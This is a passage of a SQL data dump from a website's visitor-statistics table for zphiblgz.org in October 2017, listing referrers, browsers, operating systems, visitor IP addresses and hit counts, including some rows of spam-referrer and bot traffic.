irefox','Windows','51.0','','31.132.1.190','000',7,0),(13114,'2017-10-24','https://zphiblgz.org','Chrome','Macintosh','42.0.2355.81','','104.227.17.170','000',2,0),(13115,'2017-10-24','https://www.google.co.jp/','Chrome','Windows','61.0.3163.100','','110.92.39.225','000',4,0),(13116,'2017-10-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','158.85.81.116','000',1,0),(13117,'2017-10-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','169.54.233.120','000',1,0),(13118,'2017-10-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','168.1.128.36','000',1,0),(13119,'2017-10-25','https://zphiblgz.org','Java','Unknown','1.7.0','','213.209.22.254','000',1,0),(13120,'2017-10-25','http://site.ru','Chrome','Windows','5.0.375.99','','162.144.50.194','000',4,0),(13121,'2017-10-25','https://zphiblgz.org','Firefox','Windows','40.1','','188.55.37.195','000',3,0),(13122,'2017-10-25','https://zphiblgz.org','Firefox','Windows','40.1','','154.127.112.34','000',3,0),(13123,'2017-10-25','https://zphiblgz.org','Dispatch','Unknown','0.11.3','','146.71.21.73','000',2,0),(13124,'2017-10-25','https://zphiblgz.org','Dispatch','Unknown','0.11.3','','146.71.31.232','000',2,0),(13125,'2017-10-25','https://zphiblgz.org','Dispatch','Unknown','0.11.3','','146.71.21.103','000',2,0),(13126,'2017-10-25','https://zphiblgz.org','Dispatch','Unknown','0.11.3','','104.248.4.34','000',2,0),(13127,'2017-10-25','https://zphiblgz.org','Dispatch','Unknown','0.11.3','','64.137.2.116','000',2,0),(13128,'2017-10-25','https://zphiblgz.org','Dispatch','Unknown','0.11.3','','38.100.114.190','000',2,0),(13129,'2017-10-25','https://zphiblgz.org','Dispatch','Unknown','0.11.3','','38.109.205.106','000',1,0),(13130,'2017-10-25','https://zphiblgz.org','Firefox','Windows','34.0','','83.149.19.127','000',1,0),(13131,'2017-10-25','https://zphiblgz.org','MSIE','Windows','6.0','','31.184.238.205','000',5,0),(13132,'2017-10-25','https://zphiblgz.org','Firefox','Windows','34.0','','141.105.49.130','000',1,0),(13133,'2017-10-25','http://site.ru','Chrome','Windows','5.0.375.99','','198.71.228.73','000',1,0),(13134,'2017-10-25','https://zphiblgz.org','MSIE','Windows','6.0','','31.184.238.9','000',5,0),(13135,'2017-10-25','http://zphiblgz.org/modx.php','Chrome','Windows','42.0.2311.152','','195.154.168.130','000',1,0),(13136,'2017-10-25','https://zphiblgz.org','Chrome','Linux','13.0.782.41','','185.213.210.106','000',2,0),(13137,'2017-10-25','https://zphiblgz.org','Chrome','Linux','11.0.696.50','','185.213.210.106','000',1,0),(13138,'2017-10-25','https://zphiblgz.org','Chrome','Macintosh','17.0.963.66','','185.213.210.106','000',1,0),(13139,'2017-10-25','https://zphiblgz.org','Chrome','Linux','10.0.648.204','','185.213.210.106','000',1,0),(13140,'2017-10-25','https://zphiblgz.org','Chrome','Windows','10.0.648.133','','185.213.210.106','000',1,0),(13141,'2017-10-25','https://zphiblgz.org','Chrome','Macintosh','19.0.1047.0','','185.213.210.106','000',1,0),(13142,'2017-10-25','https://zphiblgz.org','Chrome','Windows','11.0.654.0','','185.213.210.106','000',2,0),(13143,'2017-10-25','https://zphiblgz.org','Chrome','Windows','11.0.661.0','','185.213.210.106','000',1,0),(13144,'2017-10-25','https://zphiblgz.org','Chrome','Linux','17.0.963.66','','185.213.210.106','000',1,0),(13145,'2017-10-25','https://zphiblgz.org','Chrome','Macintosh','19.0.1055.1','','185.213.210.106','000',1,0),(13146,'2017-10-25','https://zphiblgz.org','Chrome','Linux','10.0.648.134','','185.213.210.106','000',1,0),(13147,'2017-10-25','https://zphiblgz.org','Chrome','Macintosh','13.0.782.41','','185.213.210.106','000',1,0),(13148,'2017-10-25','https://zphiblgz.org','Chrome','Linux','17.0.963.56','','185.213.210.106','000',1,0),(13149,'2017-10-25','https://zphiblgz.org','Chrome','Windows','11.0.699.0','','185.213.210.106','000',1,0),(13150,'2017-10-25','https://zphiblgz.org','Chrome','Macintosh','15.0.874.54','','185.213.210.106','000',1,0),(13151,'2017-10-25','https://zphiblgz.org','Chrome','Macintosh','14.0.803.0','','185.213.210.106','000',1,0),(13152,'2017-10-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','168.1.128.35','000',1,0),(13153,'2017-10-25','https://zphiblgz.org','Firefox','Windows','40.1','','219.79.219.169','000',3,0),(13154,'2017-10-25','http://site.ru','Chrome','Windows','5.0.375.99','','92.61.157.140','000',1,0),(13155,'2017-10-25','https://zphiblgz.org','Firefox','Windows','40.1','','131.72.129.109','000',3,0),(13156,'2017-10-25','http://site.ru','Chrome','Windows','5.0.375.99','','176.31.248.150','000',3,0),(13157,'2017-10-25','http://zphiblgz.org/','Chrome','Windows','36.0.1985.125','','220.181.132.177','000',2,0),(13158,'2017-10-25','https://zphiblgz.org','Chrome','Windows','50.0.2661.102','','106.120.162.108','000',1,0),(13159,'2017-10-25','https://zphiblgz.org','Chrome','Windows','50.0.2661.102','','106.120.162.107','000',1,0),(13160,'2017-10-25','http://www.zphibmaryland.org/chapters/','Chrome','Macintosh','61.0.3163.100','','138.238.233.2','000',2,0),(13161,'2017-10-25','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.185','000',3,0),(13162,'2017-10-25','http://uptime-delta.net/zphiblgz.org','Unknown','Unknown','Unknown','','74.115.214.157','000',1,0),(13163,'2017-10-25','http://zphiblgz.org','Unknown','Unknown','Unknown','','74.115.214.131','000',1,0),(13164,'2017-10-25','https://www.google.com/','Safari','iPhone','10.0','','174.205.6.50','000',1,0),(13165,'2017-10-25','https://zphiblgz.org','MSIE','Windows','6.0','','31.184.238.204','000',1,0),(13166,'2017-10-25','http://zphiblgz.org/','Firefox','Windows','47.0','','146.185.223.146','000',1,0),(13167,'2017-10-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','169.54.233.125','000',1,0),(13168,'2017-10-25','https://zphiblgz.org','Firefox','Windows','40.1','','90.39.123.240','000',3,0),(13169,'2017-10-25','https://zphiblgz.org','Firefox','Windows','29.0','','95.104.61.186','000',2,0),(13170,'2017-10-25','https://zphiblgz.org','Android Browser','Android','4.0','','51.15.40.233','000',2,0),(13171,'2017-10-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','158.85.81.122','000',1,0),(13172,'2017-10-25','http://uptime-beta.net/zphiblgz.org','Unknown','Unknown','Unknown','','67.215.230.88','000',1,0),(13173,'2017-10-25','http://zphiblgz.org','Unknown','Unknown','Unknown','','67.215.230.82','000',1,0),(13174,'2017-10-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','67.215.230.93','000',1,0),(13175,'2017-10-25','http://zphiblgz.org/','Unknown','Unknown','Unknown','','67.215.230.85','000',1,0),(13176,'2017-10-25','http://www.zphiblgz.org','Chrome','Linux','59.0.3071.115','','45.55.254.212','000',3,0),(13177,'2017-10-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','45.55.254.212','000',1,0),(13178,'2017-10-25','https://zphiblgz.org','Chrome','Macintosh','58.0.3029.81','','45.55.254.212','000',2,0),(13179,'2017-10-25','https://zphiblgz.org','Firefox','Linux','47.0','','45.55.254.212','000',2,0),(13180,'2017-10-25','https://zphiblgz.org','Firefox','Linux','49.0','','45.55.254.212','000',2,0),(13181,'2017-10-25','https://zphiblgz.org','Firefox','Windows','54.0','','45.55.254.212','000',2,0),(13182,'2017-10-25','https://zphiblgz.org','MSIE','Windows','10.0','','45.55.254.212','000',1,0),(13183,'2017-10-25','https://zphiblgz.org','Chrome','Windows','59.0.3071.115','','45.55.254.212','000',2,0),(13184,'2017-10-25','https://zphiblgz.org','Safari','Macintosh','10.0.3','','45.55.254.212','000',2,0),(13185,'2017-10-25','https://zphiblgz.org','Firefox','Macintosh','54.0','','45.55.254.212','000',1,0),(13186,'2017-10-25','https://zphiblgz.org','Chrome','Windows','60.0.3112.78','','45.55.254.212','000',1,0),(13187,'2017-10-25','https://zphiblgz.org','Chrome','Windows','34.0.1847.137','','185.191.204.5','000',1,0),(13188,'2017-10-25','https://zphiblgz.org','Chrome','Windows','34.0.1847.137','','185.191.204.9','000',1,0),(13189,'2017-10-25','https://zphiblgz.org','Chrome','Windows','34.0.1847.137','','185.191.204.3','000',1,0),(13190,'2017-10-25','https://zphiblgz.org','Chrome','Windows','34.0.1847.137','','185.191.204.13','000',1,0),(13191,'2017-10-25','http://search.yahoo.co.jp/','MSIE','Windows','11.0','','124.110.49.133','000',2,0),(13192,'2017-10-25','http://site.ru','Chrome','Windows','5.0.375.99','','31.3.16.59','000',2,0),(13193,'2017-10-25','https://www.facebook.com/','Chrome','Windows','61.0.3163.100','','73.87.167.234','000',4,0),(13194,'2017-10-25','https://zphiblgz.org','Firefox','Windows','34.0','','31.173.100.22','000',1,0),(13195,'2017-10-25','https://zphiblgz.org','Firefox','Windows','34.0','','213.151.6.234','000',1,0),(13196,'2017-10-25','https://zphiblgz.org','Firefox','Windows','40.1','','41.141.211.75','000',3,0),(13197,'2017-10-25','http://ya.ru/?q=http%3A%2F%2Fzphiblgz.org%2F%3Fauthor%3D1','Firefox','Windows','14.0.1','','195.242.80.107','000',1,0),(13198,'2017-10-25','http://site.ru','Chrome','Windows','5.0.375.99','','75.98.174.194','000',1,0),(13199,'2017-10-26','https://zphiblgz.org','MSIE','Windows','6.0','','31.184.238.180','000',5,0),(13200,'2017-10-26','http://zphiblgz.org/wp-content/modx.php','Chrome','Windows','42.0.2311.152','','195.154.168.130','000',1,0),(13201,'2017-10-26','http://site.ru','Chrome','Windows','5.0.375.99','','77.38.159.74','000',2,0),(13202,'2017-10-26','https://zphiblgz.org','Firefox','Windows','40.1','','177.132.228.55','000',3,0),(13203,'2017-10-26','http://www.google.com/','Firefox','Windows','24.0','','185.40.4.116','000',1,0),(13204,'2017-10-26','https://zphiblgz.org','Firefox','Windows','40.1','','86.124.191.231','000',3,0),(13205,'2017-10-26','http://site.ru','Chrome','Windows','5.0.375.99','','213.251.182.111','000',1,0),(13206,'2017-10-26','https://zphiblgz.org','Unknown','Unknown','Unknown','','168.1.128.38','000',1,0),(13207,'2017-10-26','http://www.zphibmaryland.org/chapters/','MSIE','Windows','11.0','','70.91.82.161','000',3,0),(13208,'2017-10-26','https://zphiblgz.org','Firefox','Windows','34.0','','95.68.194.18','000',1,0),(13209,'2017-10-26','http://www.zphibmaryland.org/chapters/','Firefox','Windows','56.0','','70.91.82.161','000',5,0),(13210,'2017-10-26','https://search.yahoo.com/','Firefox','Windows','56.0','','198.51.197.42','000',1,0),(13211,'2017-10-26','https://zphiblgz.org','Chrome','Windows','61.0.3163.100','','208.76.113.5','000',7,0),(13212,'2017-10-26','https://zphiblgz.org','Chrome','Windows','62.0.3202.62','','70.185.18.236','000',1,0),(13213,'2017-10-26','https://zphiblgz.org','Chrome','Linux','49.0.2623.75','','66.249.83.84','000',1,0),(13214,'2017-10-26','https://zphiblgz.org','Chrome','Linux','49.0.2623.75','','66.249.83.79','000',1,0),(13215,'2017-10-26','https://zphiblgz.org','Chrome','Chrome OS','60.0.3112.114','','204.126.132.241','000',1,0),(13216,'2017-10-26','https://www.google.com/','Safari','iPhone','11.0','','71.121.174.93','000',5,0),(13217,'2017-10-26','https://zphiblgz.org','Chrome','Windows','61.0.3163.100','','204.126.132.241','000',7,0),(13218,'2017-10-26','https://zphiblgz.org','Chrome','Windows','59.0.3071.115','','138.197.111.85','000',2,0),(13219,'2017-10-26','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.171','000',3,0),(13220,'2017-10-26','https://zphiblgz.org','Chrome','Windows','62.0.3202.62','','198.51.197.174','000',5,0),(13221,'2017-10-26','https://zphiblgz.org','Firefox','Macintosh','54.0','','131.171.200.183','000',2,0),(13222,'2017-10-26','https://zphiblgz.org','Safari','iPhone','11.0','','174.205.3.122','000',1,0),(13223,'2017-10-26','https://zphiblgz.org','Firefox','Windows','3.5.3','','34.214.27.209','000',2,0),(13224,'2017-10-26','http://site.ru','Chrome','Windows','5.0.375.99','','212.192.196.6','000',2,0),(13225,'2017-10-26','http://m.facebook.com/','Chrome','Android','61.0.3163.98','','71.244.137.250','000',2,0),(13226,'2017-10-26','http://zphiblgz.org/scholarship/','MSIE','Windows','6.0','','62.109.27.232','000',1,0),(13227,'2017-10-26','https://zphiblgz.org','MSIE','Windows','11.0','','23.21.112.27','000',3,0),(13228,'2017-10-26','https://www.google.com/','Opera Next','Windows','48.0.2685.52','','45.30.115.212','000',1,0),(13229,'2017-10-26','https://zphiblgz.org','Chrome','Macintosh','27.0.1453.93','','46.161.9.4','000',1,0),(13230,'2017-10-26','https://zphiblgz.org','Firefox','Windows','40.1','','94.78.66.31','000',3,0),(13231,'2017-10-26','https://zphiblgz.org','MSIE','Windows','11.0','','176.31.64.186','000',1,0),(13232,'2017-10-27','https://zphiblgz.org','Firefox','Windows','40.1','','67.142.112.100','000',2,0),(13233,'2017-10-27','https://zphiblgz.org','Firefox','Windows','40.1','','67.142.112.46','000',1,0),(13234,'2017-10-27','http://uptime-alpha.net/zphiblgz.org','Unknown','Unknown','Unknown','','74.115.214.145','000',1,0),(13235,'2017-10-27','http://zphiblgz.org','Unknown','Unknown','Unknown','','74.115.214.135','000',1,0),(13236,'2017-10-27','https://zphiblgz.org','Unknown','Unknown','Unknown','','74.115.214.151','000',1,0),(13237,'2017-10-27','http://zphiblgz.org/','Unknown','Unknown','Unknown','','74.115.214.132','000',1,0),(13238,'2017-10-27','https://zphiblgz.org','Chrome','Macintosh','26.0.1410.65','','54.202.72.71','000',1,0),(13239,'2017-10-27','http://site.ru','Chrome','Windows','5.0.375.99','','91.134.248.235','000',2,0),(13240,'2017-10-27','https://zphiblgz.org','Firefox','Windows','50.0','','192.187.101.170','000',1,0),(13241,'2017-10-27','https://zphiblgz.org','Firefox','Windows','56.0','','39.40.146.34','000',2,0),(13242,'2017-10-27','https://www.timer4web.com/','Firefox','Windows','55','','176.9.125.108','000',5,0),(13243,'2017-10-27','https://zphiblgz.org','Firefox','Windows','40.1','','124.83.24.116','000',3,0),(13244,'2017-10-27','https://zphiblgz.org','Firefox','Windows','34.0','','46.175.194.188','000',1,0),(13245,'2017-10-27','https://zphiblgz.org','MSIE','Windows','7.0','','149.154.69.99','000',1,0),(13246,'2017-10-27','https://zphiblgz.org','Firefox','Linux','5.0','','149.154.69.99','000',1,0),(13247,'2017-10-27','https://zphiblgz.org','Opera','Windows','11.60','','149.154.69.99','000',1,0),(13248,'2017-10-27','https://zphiblgz.org','MSIE','Windows','8.0','','149.154.69.99','000',1,0),(13249,'2017-10-27','zphiblgz.org','Chrome','Windows','50.0.2661.75','','91.205.173.48','000',7,0),(13250,'2017-10-27','https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=7&ved=0ahUKEwjX64LRoJHXAhXowVQKHepVAaMQFghLMAY&url=https%3A%2F%2Fzphiblgz.org%2F&usg=AOvVaw3q4W_LfCjivY3GRWBdIE5d','MSIE','Windows','11.0','','137.200.32.38','000',1,0),(13251,'2017-10-27','https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwi36P_hr5HXAhUn5YMKHZA-DK0QFggrMAA&url=https%3A%2F%2Fzphiblgz.org%2F&usg=AOvVaw3q4W_LfCjivY3GRWBdIE5d','MSIE','Windows','11.0','','50.242.208.25','000',1,0),(13252,'2017-10-27','https://zphiblgz.org','Firefox','Windows','40.1','','41.85.161.134','000',3,0),(13253,'2017-10-27','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.186','000',3,0),(13254,'2017-10-27','https://zphiblgz.org','Chrome','Windows','62.0.3202.62','','198.51.197.174','000',5,0),(13255,'2017-10-27','https://zphiblgz.org','MSIE','Windows','11.0','','173.208.239.10','000',1,0),(13256,'2017-10-27','https://zphiblgz.org','Firefox','Windows','32.0','','78.108.80.121','000',2,0),(13257,'2017-10-27','https://zphiblgz.org','Firefox','Windows','32.0','','37.9.168.169','000',2,0),(13258,'2017-10-27','https://zphiblgz.org','Chrome','Windows','41.0.2228.0','','104.166.88.75','000',2,0),(13259,'2017-10-27','https://zphiblgz.org','Firefox','Windows','40.1','','210.213.201.100','000',3,0),(13260,'2017-10-27','https://zphiblgz.org','Unknown','Unknown','Unknown','','191.96.249.184','000',2,0),(13261,'2017-10-27','http://site.ru','Chrome','Windows','5.0.375.99','','67.227.166.210','000',4,0),(13262,'2017-10-28','https://zphiblgz.org','Firefox','Windows','40.1','','41.85.161.134','000',3,0),(13263,'2017-10-28','https://zphiblgz.org','Firefox','Windows','34.0','','83.149.47.187','000',1,0),(13264,'2017-10-28','https://zphiblgz.org','Firefox','Windows','40.1','','103.240.235.26','000',3,0),(13265,'2017-10-28','https://zphiblgz.org','Firefox','Windows','40.1','','79.61.91.45','000',3,0),(13266,'2017-10-28','https://zphiblgz.org','Unknown','Unknown','Unknown','','196.52.43.58','000',1,0),(13267,'2017-10-28','https://zphiblgz.org','Dispatch','Unknown','0.11.3','','146.71.22.19','000',2,0),(13268,'2017-10-28','https://zphiblgz.org','Dispatch','Unknown','0.11.3','','38.109.205.123','000',2,0),(13269,'2017-10-28','https://zphiblgz.org','Dispatch','Unknown','0.11.3','','146.71.25.150','000',2,0),(13270,'2017-10-28','https://zphiblgz.org','Dispatch','Unknown','0.11.3','','38.109.207.19','000',2,0),(13271,'2017-10-28','https://zphiblgz.org','Dispatch','Unknown','0.11.3','','38.109.205.237','000',2,0),(13272,'2017-10-28','https://zphiblgz.org','Dispatch','Unknown','0.11.3','','146.71.31.67','000',2,0),(13273,'2017-10-28','https://zphiblgz.org','Dispatch','Unknown','0.11.3','','146.71.23.39','000',1,0),(13274,'2017-10-28','https://zphiblgz.org','Unknown','Unknown','Unknown','','169.54.233.125','000',1,0),(13275,'2017-10-28','http://zphiblgz.org/','Chrome','Windows','56.0.2924.87','','163.172.4.153','000',1,0),(13276,'2017-10-28','https://zphiblgz.org/','MSIE','Windows','11.0','','163.172.4.153','000',1,0),(13277,'2017-10-28','zphiblgz.org','Chrome','Windows','50.0.2661.75','','149.202.33.10','000',1,0),(13278,'2017-10-28','https://zphiblgz.org','Chrome','Linux','49.0.2623.75','','66.249.83.86','000',1,0),(13279,'2017-10-28','https://zphiblgz.org','Chrome','Linux','49.0.2623.75','','66.249.83.80','000',1,0),(13280,'2017-10-28','https://zphiblgz.org','Unknown','Unknown','Unknown','','54.236.1.14','000',1,0),(13281,'2017-10-28','https://zphiblgz.org','Firefox','Windows','40.1','','175.136.117.252','000',2,0),(13282,'2017-10-28','https://zphiblgz.org','Firefox','Windows','29.0','','222.223.204.46','000',2,0),(13283,'2017-10-28','http://site.ru','Chrome','Windows','5.0.375.99','','213.251.182.105','000',2,0),(13284,'2017-10-28','http://yandex.ru/clck/jsredir?from=yandex.ru%3Bsearch%3Bweb%3B%3B&text=&etext=1588.IDykygob7G7Ex0M-oR6R3A3Sw65pBpe51Hrj2tXnOBGuMUbv7lN-0_jZ_IK_2lqq.a531c32afdb74874107c0eddf5cf2101d93efab6&uuid=&state=_BLhILn4SxNIvvL0W45KSic66uCIg23qh8iRG98qeIXmeppkgUc0YMkOSpatjLUqgxH-XWLwn-g&data=UlNrNmk5WktYejR0eWJFYk1LdmtxcnNIMk1HMTBsaUYwMTNKaEUyUXdWTFpUeUVaNjZCRU9BYW1ENmNBQV9qeGptSjBiWHcyN1NIcVpqZm5JWmtxeE92aHpOaXVHbnYtOS11aE9MWjIyamt1NEJVbmtnb1B2Zw&b64e=2&sign=bb070d25282e72353076e220ba0a6d22&keyno=0&cst=AiuY0DBWFJ7IXge4WdYJQaYgAYq7JarryQ6FeP1yvbB4ormappNipdEJTVax-s8vmlhbtsmH01IeBxYjJb0sd-PREc-uguEGzeo8buHZ1R_JFxBWnZ3p0d_vOBTzaZFzPulck9nBtr3xZBCJMuOJAca2rvdb_dau&ref=orjY4mGPRjk5boDnW0uvlrrd71vZw9kp5uQozpMtKCUrYE_V40103pS1ZTHOkO1dRREZjZzBJl4oEAmDpQ_Pme83o525W_m_DFyrIWbVkDv2VQhyT1VmAA&l10n=ru&cts=1509211951081&mc=3.89346045376','MSIE','Windows','10.0','','5.164.80.41','000',1,0),(13285,'2017-10-28','https://zphiblgz.org','Unknown','Unknown','Unknown','','142.4.200.37','000',1,0),(13286,'2017-10-28','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.186','000',3,0),(13287,'2017-10-28','https://zphiblgz.org','Safari','iPhone','9.0','','58.248.206.141','000',1,0),(13288,'2017-10-28','https://zphiblgz.org','Safari','iPhone','9.0','','124.235.138.11','000',1,0),(13289,'2017-10-28','https://zphiblgz.org','Firefox','Windows','34.0','','5.138.107.55','000',1,0),(13290,'2017-10-28','http://m.facebook.com','AppleWebKit','iPhone','603.3.8','','69.143.35.179','000',3,0),(13291,'2017-10-28','https://www.google.com/','Chrome','Macintosh','60.0.3112.90','','96.231.177.157','000',2,0),(13292,'2017-10-28','http://site.ru','Chrome','Windows','5.0.375.99','','65.99.237.226','000',3,0),(13293,'2017-10-28','https://zphiblgz.org','Firefox','Windows','40.1','','77.31.223.251','000',3,0),(13294,'2017-10-28','https://zphiblgz.org','MSIE','Windows','11.0','','142.54.161.10','000',5,0),(13295,'2017-10-28','https://zphiblgz.org','Firefox','Windows','40.1','','71.93.101.111','000',3,0),(13296,'2017-10-28','https://zphiblgz.org','Firefox','Windows','40.1','','191.209.109.60','000',3,0),(13297,'2017-10-28','https://zphiblgz.org','Unknown','Unknown','Unknown','','158.85.81.114','000',2,0),(13298,'2017-10-28','http://www.google.com/','Firefox','Windows','24.0','','185.40.4.116','000',1,0),(13299,'2017-10-28','http://www.zphiblgz.org','MSIE','Windows','10.0','','159.203.112.166','000',2,0),(13300,'2017-10-28','https://zphiblgz.org','Unknown','Unknown','Unknown','','159.203.112.166','000',1,0),(13301,'2017-10-28','https://zphiblgz.org','Firefox','Linux','49.0','','159.203.112.166','000',5,0),(13302,'2017-10-28','https://zphiblgz.org','Chrome','Macintosh','58.0.3029.81','','159.203.112.166','000',1,0),(13303,'2017-10-28','https://zphiblgz.org','Firefox','Windows','54.0','','159.203.112.166','000',1,0),(13304,'2017-10-28','https://zphiblgz.org','Chrome','Linux','59.0.3071.115','','159.203.112.166','000',3,0),(13305,'2017-10-28','https://zphiblgz.org','Firefox','Macintosh','54.0','','159.203.112.166','000',1,0),(13306,'2017-10-28','https://zphiblgz.org','Firefox','Linux','47.0','','159.203.112.166','000',1,0),(13307,'2017-10-28','https://zphiblgz.org','Opera Next','Macintosh','46.0.2597.57','','159.203.112.166','000',2,0),(13308,'2017-10-28','https://zphiblgz.org','Firefox','Linux','54.0','','159.203.112.166','000',2,0),(13309,'2017-10-28','https://zphiblgz.org','Firefox','Windows','40.1','','190.88.225.151','000',2,0),(13310,'2017-10-28','https://www.google.com/','Chrome','Windows','62.0.3202.62','','184.170.66.132','000',1,0),(13311,'2017-10-29','https://zphiblgz.org','Firefox','Windows','40.1','','175.101.144.42','000',3,0),(13312,'2017-10-29','https://zphiblgz.org','Chrome','Macintosh','27.0.1453.93','','46.161.9.4','000',1,0),(13313,'2017-10-29','https://zphiblgz.org','Chrome','Macintosh','43.0.2357.134','','218.92.147.30','000',1,0),(13314,'2017-10-29','https://zphiblgz.org','Firefox','Windows','40.1','','213.5.54.246','000',3,0),(13315,'2017-10-29','http://uptime-alpha.net/zphiblgz.org','Unknown','Unknown','Unknown','','173.234.234.212','000',1,0),(13316,'2017-10-29','http://zphiblgz.org','Unknown','Unknown','Unknown','','173.234.234.196','000',1,0),(13317,'2017-10-29','https://zphiblgz.org','Firefox','Windows','40.1','','61.3.254.50','000',3,0),(13318,'2017-10-29','https://zphiblgz.org','Firefox','Windows','34.0','','178.155.6.82','000',1,0),(13319,'2017-10-29','https://zphiblgz.org','Firefox','Windows','40.1','','62.151.242.110','000',3,0),(13320,'2017-10-29','http://uptime-delta.net/zphiblgz.org','Unknown','Unknown','Unknown','','74.115.214.145','000',1,0),(13321,'2017-10-29','http://zphiblgz.org','Unknown','Unknown','Unknown','','74.115.214.139','000',1,0),(13322,'2017-10-29','https://zphiblgz.org','Chrome','Macintosh','49.0.2623.87','','104.129.192.80','000',1,0),(13323,'2017-10-29','https://zphiblgz.org','Firefox','Windows','34.0','','95.78.24.213','000',1,0),(13324,'2017-10-29','https://www.google.com/','Safari','Macintosh','10.1.1','','160.39.125.118','000',3,0),(13325,'2017-10-29','https://zphiblgz.org','Chrome','Windows','41.0.2228.0','','71.6.165.200','000',1,0),(13326,'2017-10-29','https://zphiblgz.org','Unknown','Unknown','Unknown','','169.54.233.118','000',1,0),(13327,'2017-10-29','https://zphiblgz.org','Safari','iPhone','7.0','','199.30.24.116','000',1,0),(13328,'2017-10-29','https://zphiblgz.org','Firefox','Windows','40.1','','85.207.73.101','000',3,0),(13329,'2017-10-29','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.185','000',4,0),(13330,'2017-10-29','https://www.google.com/','Safari','Macintosh','11.0','','68.174.42.158','000',2,0),(13331,'2017-10-29','https://zphiblgz.org','Chrome','Chrome OS','60.0.3112.114','','69.143.35.179','000',1,0),(13332,'2017-10-29','https://zphiblgz.org','Chrome','Linux','49.0.2623.75','','66.249.83.80','000',1,0),(13333,'2017-10-29','https://zphiblgz.org','Firefox','Windows','40.1','','213.87.123.108','000',3,0),(13334,'2017-10-29','https://zphiblgz.org','Unknown','Unknown','Unknown','','169.54.244.82','000',1,0),(13335,'2017-10-29','https://zphiblgz.org','Chrome','Macintosh','60.0.3112.90','','138.197.111.59','000',3,0),(13336,'2017-10-29','https://zphiblgz.org','Chrome','Linux','49.0.2623.75','','66.249.93.64','000',1,0),(13337,'2017-10-29','https://zphiblgz.org','Chrome','Linux','49.0.2623.75','','66.249.93.74','000',1,0),(13338,'2017-10-29','https://zphiblgz.org','Unknown','Unknown','Unknown','','86.53.250.54','000',1,0),(13339,'2017-10-29','https://zphiblgz.org','Unknown','Unknown','Unknown','','158.85.81.115','000',1,0),(13340,'2017-10-29','https://zphiblgz.org','Firefox','Windows','40.1','','177.190.67.164','000',3,0),(13341,'2017-10-29','https://zphiblgz.org','Chrome','Linux','40.0.2267.90','','104.144.7.226','000',2,0),(13342,'2017-10-29','https://zphiblgz.org','Chrome','Linux','43.0.2357.130','','195.22.126.98','000',2,0),(13343,'2017-10-30','http://zphiblgz.org/','Firefox','Windows','52.0','','5.35.16.67','000',3,0),(13344,'2017-10-30','http://zpharm.de/sites/lb/05_pharma_firmen.htm','Firefox','Windows','43.0','','109.172.196.234','000',2,0),(13345,'2017-10-30','https://zphiblgz.org','Firefox','Windows','48.0','','78.85.161.16','000',1,0),(13346,'2017-10-30','https://zphiblgz.org','Unknown','Unknown','Unknown','','158.85.81.122','000',1,0),(13347,'2017-10-30','https://zphiblgz.org','Android Browser','Android','4.0','','52.166.128.69','000',6,0),(13348,'2017-10-30','http://www.zphibmaryland.org/chapters/','Firefox','Windows','56.0','','167.102.146.2','000',12,0),(13349,'2017-10-30','https://zphiblgz.org','Firefox','Windows','1.0.7','','54.148.225.162','000',1,0),(13350,'2017-10-30','android-app://com.google.android.googlequicksearchbox','Chrome','Android','61.0.3163.98','','107.77.204.71','000',2,0),(13351,'2017-10-30','http://uptime-delta.net/zphiblgz.org','Unknown','Unknown','Unknown','','74.115.214.149','000',1,0),(13352,'2017-10-30','http://zphiblgz.org','Unknown','Unknown','Unknown','','74.115.214.143','000',1,0),(13353,'2017-10-30','https://zphiblgz.org','Firefox','Windows','38.0','','195.22.127.139','000',2,0),(13354,'2017-10-30','https://zphiblgz.org','Firefox','Windows','40.1','','121.116.255.157','000',3,0),(13355,'2017-10-30','https://zphiblgz.org','Safari','iPhone','7.0','','131.253.27.86','000',1,0),(13356,'2017-10-30','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.186','000',3,0),(13357,'2017-10-30','https://zphiblgz.org','Chrome','Windows','62.0.3202.62','','198.51.197.174','000',1,0),(13358,'2017-10-30','https://zphiblgz.org','Chrome','Macintosh','43.0.2357.134','','218.92.147.30','000',1,0),(13359,'2017-10-30','https://zphiblgz.org','AppleWebKit','Windows','534','','131.253.27.114','000',1,0),(13360,'2017-10-30','https://zphiblgz.org','Chrome','Macintosh','44.0.2403.89','','103.255.254.123','000',1,0),(13361,'2017-10-30','https://zphiblgz.org','Firefox','Windows','40.1','','189.84.181.77','000',3,0),(13362,'2017-10-30','https://www.google.com/','Chrome','Windows','61.0.3163.100','','100.36.90.41','000',22,0),(13363,'2017-10-30','http://uptime-beta.net/zphiblgz.org','Unknown','Unknown','Unknown','','173.234.234.199','000',1,0),(13364,'2017-10-30','http://zphiblgz.org','Unknown','Unknown','Unknown','','173.234.234.217','000',2,0),(13365,'2017-10-30','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.234.234.209','000',1,0),(13366,'2017-10-30','https://zphiblgz.org','Firefox','Windows','24.0','','136.243.67.139','000',2,0),(13367,'2017-10-30','https://zphiblgz.org','Chrome','Windows','34.0.1797.2','','136.243.67.139','000',3,0),(13368,'2017-10-31','https://search.yahoo.com/','Firefox','Windows','56.0','','80.106.140.5','000',2,0),(13369,'2017-10-31','https://zphiblgz.org','python-requests','Unknown','2.18.3','','175.42.44.95','000',2,0),(13370,'2017-10-31','https://zphiblgz.org','Safari','iPhone','9537.53','','175.42.44.95','000',1,0),(13371,'2017-10-31','https://zphiblgz.org','Firefox','Windows','31.0','','175.42.44.95','000',1,0),(13372,'2017-10-31','http://zphiblgz.org','Firefo